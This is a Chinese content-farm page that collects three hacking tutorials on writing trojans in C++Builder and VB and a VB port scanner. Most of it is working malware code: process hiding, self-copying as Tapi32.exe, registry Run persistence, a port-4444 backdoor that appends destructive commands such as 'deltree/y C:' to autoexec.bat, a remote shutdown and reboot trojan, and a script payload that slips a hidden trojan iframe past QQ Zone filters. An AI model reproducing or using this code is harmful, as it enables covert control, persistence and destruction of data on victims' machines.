如何写论文?写好论文?免费论文网提供各类免费论文写作素材!
当前位置:免费论文网 > 美文好词 > 优质好文 > vb黑客木马编程

vb黑客木马编程

来源:免费论文网 | 时间:2018-11-08 14:49 | 移动端:vb黑客木马编程

篇一:黑客技术:木马是如何编写的(一)

黑客技术:木马是如何编写的(一)

周侃·天极e企业<br>

<br>

特洛依木马这个名词大家应该不陌生,自从98年“死牛崇拜”黑客小组公布Back Orifice以来,木马犹如平地上的惊雷,使在Dos——Windows时代中长大的中国网民从五彩缤纷的网络之梦中惊醒,终于认识到的网络也有它邪恶的一面,一时间人心惶惶。<br> <br>

我那时在《电脑报》上看到一篇文章,大意是一个菜鸟被人用BO控制了,吓得整天吃不下饭、睡不着觉、上不了网,到处求救!要知道,木马(Trojan)的历史是很悠久的:早在AT&T Unix和BSD Unix十分盛行的年代,木马是由一些玩程式(主要是C)水平很高的年轻人(主要是老美)用C或Shell语言编写的,基本是用来窃取登陆主机的口令,以取得更高的权限。那时木马的主要方法是诱骗——先修改你的.profile文件,植入木马;当你登陆时将你敲入的口令字符存入一个文件,用Email的形式发到攻击者的邮箱里。国内的年轻人大都是在盗版Dos的熏陶下长大的,对网络可以说很陌生。直到Win9x横空出世,尤其是WinNt的普及,大大推动了网络事业的发展的时候,BO这个用三年后的眼光看起来有点简单甚至可以说是简陋的木马(甚至在Win9x的“关闭程序”对话框可以看到进程)给了当时中国人极大的震撼,它在中国的网络安全方面可以说是一个划时代的软件。<br> <br>

自己编写木马,听起来很Cool是不是?!木马一定是由两部分组成——服务器程序(Server)和客户端程序(Client),服务器负责打开攻击的道路,就像一个内奸特务;客户端负责攻击目标,两者需要一定的网络协议来进行通讯(一般是TCP/IP协议)。为了让大家更好的了解木马攻击技术,破除木马的神秘感,我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马,使大家能更好地防范和查杀各种已知和未知的木马。<br> <br>

首先是编程工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi,这里我们选用C++Builder(以下简称BCB);VC虽然好,但GUI设计太复杂,为了更好地突出我的例子,集中注意力在木马的基本原理上,我们选用可视化的BCB;Delphi也不错,但缺陷是不能继承已有的资源(如“死牛崇拜”黑客小组公布的BO2000源代码,是VC编写的,网上俯拾皆是);VB嘛,谈都不谈——难道你还给受害者传一个1兆多的动态链接库——Msvbvm60.dll吗?<br>

<br>

启动C++Builder 5.0企业版,新建一个工程,添加三个VCL控件:一个是Internet页中的Server Socket,另两个是Fastnet页中的NMFTP和NMSMTP。Server Socket的功能是用来使本程序变成一个服务器程序,可以对外服务(对攻击者敞开大门)。Socket最初是在Unix上出现的,后来微软将它引入了Windows中(包括Win98和WinNt);后两个控件的作用是用来使程序具有FTP(File Transfer Protocol文件传输协议)和SMTP(Simple Mail Transfer Protocol简单邮件传输协议)功能,大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。<br>

<br>

Form窗体是可视的,这当然是不可思议的。不光占去了大量的空间(光一个Form就

有300K之大),而且使软件可见,根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form,就像Delphi用过程实现的小程序一般只有17K左右那样。<br> <br>

我们首先应该让我们的程序能够隐身。双击Form,首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。这看起来很神秘,其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。因此,只要将我们的程序在进程数据库中用RegisterServiceProcess()函数注册成服务进程(Service Process)就可以了。不过该函数的声明在Borland预先打包的头文件中没有,那么我们只好自己来声明这个位于KERNEL32.DLL中的鸟函数了。<br>

<br>

首先判断目标机的操作系统是Win9x还是WinNt:<br>

<br>

{<br>

DWORD dwVersion = GetVersion();<br>

// 得到操作系统的版本号<br>

if (dwVersion >= 0x80000000)<br>

// 操作系统是Win9x,不是WinNt<br>

{ <br>

typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);<br>

//定义RegisterServiceProcess()函数的原型<br>

HINSTANCE hDLL;<br>

LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;<br>

hDLL = LoadLibrary("KERNEL32");<br>

//加载RegisterServiceProcess()函数所在的动态链接库KERNEL32.DLL<br>

lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");<br>

//得到RegisterServiceProcess()函数的地址<br>

lpRegisterServiceProcess(GetCurrentProcessId(),1);<br>

//执行RegisterServiceProcess()函数,隐藏本进程<br>

FreeLibrary(hDLL);<br>

//卸载动态链接库<br>

}<br>

}<br>

<br>

这样就终于可以隐身了(害我敲了这么多代码!)。为什么要判断操作系统呢?因为WinNt中的进程管理器可以对当前进程一览无余,因此没必要在WinNt下也使用以上代码(不过你可以使用其他的方法,这个留到后面再讲)。<br>

<br>

接着再将自己拷贝一份到%System%目录下,例如:C:\Windows\System,并修改注册表,以便启动时自动加载:<br>

<br>

{ <br>

char TempPath[MAX_PATH];<br>

//定义一个变量<br>

GetSystemDirectory(TempPath ,MAX_PATH);<br>

//TempPath是system目录缓冲区的地址,MAX_PATH是缓冲区的大小,得到目标机的System目录路径<br>

SystemPath=AnsiString(TempPath);<br>

//格式化TempPath字符串,使之成为能供编译器使用的样式<br>

CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi32.exe").c_str() ,FALSE);<br> //将自己拷贝到%System%目录下,并改名为Tapi32.exe,伪装起来<br>

Registry=new TRegistry;<br>

//定义一个TRegistry对象,准备修改注册表,这一步必不可少<br>

Registry->RootKey=HKEY_LOCAL_MACHINE;<br>

//设置主键为HKEY_LOCAL_MACHINE<br>

Registry->OpenKey("Software\\Microsoft\\Windows\\<br>

CurrentVersion\\Run",TRUE);<br>

//打开键值Software\\Microsoft\\Windows\\CurrentVersion\\Run,如果不存在,就创建之<br> try<br>

{<br>

//如果以下语句发生异常,跳至catch,以避免程序崩溃<br>

if(Registry->ReadString("crossbow")!=SystemPath+"\\Tapi32.exe")<br>

Registry->WriteString("crossbow",SystemPath+"\\Tapi32.exe");<br>

//查找是否有“crossbow”字样的键值,并且是否为拷贝的目录%System%+Tapi32.exe<br>

//如果不是,就写入以上键值和内容<br>

}<br>

catch(...)<br>

{<br>

//如果有错误,什么也不做<br>

}<br>

}<br>

<br>

好,FormCreate过程完成了,这样每次启动都可以自动加载Tapi32.exe,并且在“关闭程序”对话框中看不见本进程了,木马的雏形初现。<br>

<br>

接着选中ServerSocket控件,在左边的Object Inspector中将Active改为true,这样程序一启动就打开特定端口,处于服务器工作状态。再将Port填入4444,这是木马的端口号,当然你也可以用别的。但是你要注意不要用1024以下的低端端口,因为这样不但可能会与基本网络协议使用的端口相冲突,而且很容易被发觉,因此尽量使用1024以上的高端端口(不过也有这样一种技术,它故意使用特定端口,因为如果引起冲突,Windows也不会报错 ^_^)。你可以看一看TNMFTP控件使用的端口,是21号端口,这是FTP协议的专用控制端口(FTP Control Port);同理TNMSMTP的25号端口也是SMTP协议的专用端口。<br> <br>

再选中ServerSocket控件,点击Events页,双击OnClientRead事件,敲入以下代码:<br>

<br>

{<br>

FILE *fp=NULL;<br>

char * content;<br>

int times_of_try;<br>

char TempFile[MAX_PATH];<br>

//定义了一堆待会儿要用到的变量<br>

sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\\Win369.BAT")).c_str());<br> //在%System%下建立一个文本文件Win369.bat,作为临时文件使用<br>

AnsiString temp=Socket->ReceiveText();<br>

//接收客户端(攻击者,也就是你自己)传来的数据<br>

}<br>

<br>

好,大门敞开了!接着就是修改目标机的各种配置了!^_^ 首先我们来修改Autoexec.bat和Config.sys吧:<br>

<br>

{<br>

if(temp.SubString(0,9)=="edit conf")<br>

//如果接受到的字符串的前9个字符是“edit conf”<br>

{<br>

int number=temp.Length();<br>

//得到字符串的长度<br>

int file_name=atoi((temp.SubString(11,1)).c_str());<br>

//将第11个字符转换成integer型,存入file_name变量<br>

//为什么要取第11个字符,因为第10个字符是空格字符<br>

content=(temp.SubString(12,number-11)+'\n').c_str();<br>

//余下的字符串将被作为写入的内容写入目标文件<br>

FILE *fp=NULL;<br>

char filename[20];<br>

chmod("c:\\autoexec.bat",S_IREAD|S_IWRITE);<br>

chmod("c:\\config.sys",S_IREAD|S_IWRITE);<br>

//将两个目标文件的属性改为可读可写<br>

if(file_name==1)<br>

sprintf(filename,"%s","c:\\autoexec.bat");<br>

//如果第11个字符是1,就把Autoexec.bat格式化<br>

else if(file_name==2)<br>

sprintf(filename,"%s","c:\\config.sys");<br>

//如果第11个字符是1,就把Config.sys格式化<br>

times_of_try=0;<br>

//定义计数器<br>

while(fp==NULL)<br>

{<br>

//如果指针是空<br>

fp=fopen(filename,"a+");<br>

//如果文件不存在,创建之;如果存在,准备在其后添加<br>

//如果出错,文件指针为空,这样就会重复<br>

times_of_try=times_of_try+1;<br>

//计数器加1<br>

if(times_of_try>100)<br>

{<br>

//如果已经试了100次了,仍未成功<br>

Socket->SendText("Fail By Open File");<br>

//就发回“Fail By Open File”的错误信息<br>

goto END;<br>

//跳至END处<br>

}<br>

}<br>

fwrite(content,sizeof(char),strlen(content),fp);<br>

//写入添加的语句,例如deltree/y C:或者format/q/autotest C:,够毒吧?!<br> fclose(fp);<br>

//写完后关闭目标文件<br>

Socket->SendText("Sucess");<br>

//然后发回“Success”的成功信息<br>

}<br>

}<br>

<br>

你现在可以通过网络来察看目标机上的这两个文件了,并且还可以向里面随意添加任何命令。呵呵,这只不过是牛刀小试罢了。朋友,别走开!(

QQ空间插入网页木马

今天我来做个 破解QQ空间插入网页木马的现在腾讯 已经代码

封了很多QQ空间代码了就如 以前 <iframe src="木马地址" name="lcx" width="0" height="0" frameborder="0"></iframe>插入网页木马的代码也早被封了

纵横qzone界最叼的代码,已经禁用,突破方法!

iframe代码已经禁用,这是众所周知的,但现在有突破禁用的方法,绝对够酷!

代码如下:

<div id=DI><img src="javascript:DI.innerHTML='<iframe src=木马地址 width=190 height=190 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></iframe>'" style=display:none></div>

我现在用黑客基地 [url]http://hackbase.com/[/url]地址示范给大家看看

好了不打字了

大家看我操作

篇二:利用VB编写破坏性木马

利用 VB 编写破坏性木马作者:不详 文章来源:华盟收集 点击数: 11051 更新时间:2008-11-8首先,新建一工程,名为 Serv er,新建一个窗体,Name 为 Serve r, 在窗体中加入一个 winsock 控件, Name 设为 sckServer,协议设为默 认的 TCP/IP 协议。 接下来我们回来 Server 窗体模 块中,添加如下代码:以下是代码片段: 以下是代码片段: Private Sub form_Load() With Me .sckServer.LocalPort = 88917'本地端口(呵呵!我的生日!) .sckServer.Listen '开始监听 End With End Sub'接受客户端的连接请求。Private Sub sckServer_ConnectionRequest(ByVal requestID As Long) With Me If .sckServer.State <>sckClosed Then .sckServer.Close

.sckServer.Accept (requestID) End With End Sub下面我们来建立客户端程序:新建一个工程,名为 Client,把窗体名为 Client,在上 面加入一个 winsock 控件,名为 sckClient,协议为 TCP/IP 协议。再加一个按钮 cmdConn ect 在窗体模块中加入代码:以下是代码片段: 以下是代码片段: Private Sub form_Load() With Me .sckClient.RemoteHost = "127.0.0.1"'设置远程 IP,本例设为本机。 .sckClient.RemotePort = 88917 '远程端口,就为 server 中的设置一样. End With End SubPrivate sub cmdConnect_Click() SckClient.Connect End sub至此,单击 Connect 按钮我们的两个工程已经可以进行通信了,但看不见,你可以 在 Client 中的 sckClient_Connect 事件中加入代码:debug.print “Connetion successful!”来 查看。 这仅是第一步,一点工作也做不了,下面我们来为它们添加功能。为了简单,本文 章只实现一点小小的功能——关机,重启,注销。好,开始吧! 在 Server 工程中新建一个模块,Name 为 modApi,这个模快为一些 API 函数,添加 如下 API 函数:以下是代码片段: 以下是代码片段: Public Declare Function ExitWindowXXX Lib "user32" Alias "ExitWindowXXX" (ByVal uFlags As

Long, ByVal dwReserved As Long) As LongPublic Const EWX_LOGOFF = 0 Public Const EWX_REBOOT = 2 Public Const EWX_SHUTDOWN = 1 Public Declare Function ClipCursor Lib "user32" Alias "ClipCursor" (lpRect As Any) As LongPublic Type RECT Left As Long Top As Long Right As Long Bottom As Long End Type注:在两个 socket 中编程中,进行通信的重要事件是 DataArrival 事件,用于接收远 程数据。 下面在 Client 工程的 Client 窗体中放入三个按钮,分别为 cmdExit,cmdLogoff,cmdRe boot。它们用于对远程的关机,注销,重启操作。分别添加如下代码:以下是代码片段: 以下是代码片段: Private Sub cmdExit_Click() Me.sckClient.SendData "Exit" End SubPrivate Sub cmdLogoff_Click() Me.sckClient.SendData "Logoff" End SubPrivate Sub cmdReboot_Click()

Me.sckClient.SendData "Reboot" End Sub全都是对服务端发出请求。下面转到 Server 工程中:在 Server 中添加 sckServer 的 D ataArrial 事件,接收客户端的请求。以下是代码片段: 以下是代码片段: Private Sub sckServer_DataArrival(ByVal bytesTotal As Long) Dim strData As String With Me ' 接收客户请求的信息 .sckServer.GetData strData Select Case strData Case "Exit" '关机 Call ExitWindowXXX(EWX_SHUTDOWN, 0) Case "Reboot" '重启 Call ExitWindowXXX(EWX_REBOOT, 0) Case "Logoff" '注销 Call ExitWindowXXX(EWX_LOGOFF, 0) End Select End WithEnd Sub好了,到此我们已经实现功能了,但还不行,我们要它在背后运行。这简单,在 Serv er 中的 form_Load 事件中加入一句:me.hide。好这下看不见了,但大家知道木马是一开 机就自动运行了,这又是为什么,怎么实现的?把它加入到注册表的启动组中?对,不错, 跟我来吧!

回到 Server 工程中的 modApi 中加入如下 API 函数:以下是代码片段: 以下是代码片段: Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As LongPublic Declare Function RegSetvalueEx Lib "advapi32.dll" Alias "RegSetvalueExA" (ByVal hKey As Long, ByVal lpvalueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As LongPublic Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long Public Const REG_BINARY = 3Public Const REG_SZ = 1Public Const HKEY_LOCAL_MACHINE = &H80000002Public Const HKEY_CLASSES_ROOT = &H80000000写到注册表启动组中的过程。Public Sub StartupGroup() Dim sKey As String Dim result As Long Dim hKeyID As Long

篇三:VB黑客攻击扫描程序源代码

首次曝光 黑客攻击扫描程序源代码 类型:原创 作者:中关村在线 netdream 日期:2005-08-15 08:43:52

真正的黑客是那些具有开源思想的程序员(不知我这么讲会不会有鸡蛋扔过来),现在网上的黑客工具多了,黑别人与被黑的几率就大了。黑客工具始终是一把双刃剑,他们可以是检测网络漏洞的助手,也可以是黑别人的工具。喜欢黑客技术的网友一定用过网络扫描器,这是入侵之前踩点儿的好工具,大家一定对他们是怎么做出来的很感兴趣,好,下面我就带大家一起来了解一下一个简单的端口扫描器是如何做出来的。

"端口扫描"通常指用同一信息对目标计算机的所有所需扫描的端口进行发送,然后根据返回端口状态来分析目标计算机的端口是否打开、是否可用。"端口扫描"行为的一个重要特征是:在短时期内有很多来自相同的信源地址传向不同的目的地端口的包。

端口扫描器通过选用远程TCP/IP协议不同端口的服务,记录目标计算机端口给予的回答的方法,可以搜集到很多关于目标计算机的各种有用信息(比如:是否有端口在侦听?是否允许匿名登陆?是否有可写的FTP目录,是否能用TELNET等 )。

端口扫描的基本原理图

好了,下面我们就用VB6.0打造一个属于自己的端口扫描器吧。

首先新建工程,准备好以下控件:SSTab、Label、Textbox、Commandbutton、Progressbar、PictureBox、Winsock、Flatscrollbar、Optionbutton.

添加两个窗体和一个模块,分别命名为Frmscaner、OpenPortDlg、Module1。Frmscaner为扫描器的主窗体,OpenPortDlg为扫描结束后的弹出结果窗口,Module1当然就是我们所要添加的模块了,如下图拖放好控件,准备添加代码。

设计界面

在通用声明部分添加如下代码:

Option Explicit

Dim countline As Integer

Dim nowport As Integer

Dim lognum As Integer

Dim fso As New FileSystemObject

Dim flag As Boolean

Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Integer, ByVal lParam As Long) As Long

Const EM_GETLINECOUNT = &HBA

Const EM_GETLINE = &HC4

在Command1中,即开始按钮中添加如下代码:

Private Sub Command1_Click()

Dim i

If Command1.Caption = "开始" Then

GoOnFlag = True

Command1.Caption = "停止"

WckNum = ThreadNUM.Value

StartPort = PORTSTART.Text

EndPort = PORTEND.Text

RemoteIP = IPADDRESS.Text

Fengzi = 0

Fengmu = EndPort - StartPort + 1

portscan StartPort, EndPort, WckNum

Else

Command1.Enabled = False

GoOnFlag = False

DoEvents

On Error Resume Next

For i = 1 To WckNum

Winsock(i).Close

Next i

End If

End Sub

在退出按钮中只需写一句Unload Me就可以了: Private Sub Command2_Click()

Unload Me

End Sub

在Form Load中添加:

Private Sub Form_Load()

WckNum = ThreadNUM.Value

StartPort = PORTSTART.Text

EndPort = PORTEND.Text

PgBar.Value = 0

Call paintstatus

flag = True

End Sub

在Form Resize中添加:

Private Sub Form_Resize()

STATUS.Width = Me.Width - 4830

End Sub

在通用 Frame1_DblClick中添加:

Private Sub Frame1_DblClick(Cancel As MSForms.ReturnBoolean) If flag Then


vb黑客木马编程》由:免费论文网互联网用户整理提供;
链接地址:http://www.csmayi.cn/meiwen/26995.html
转载请保留,谢谢!
相关文章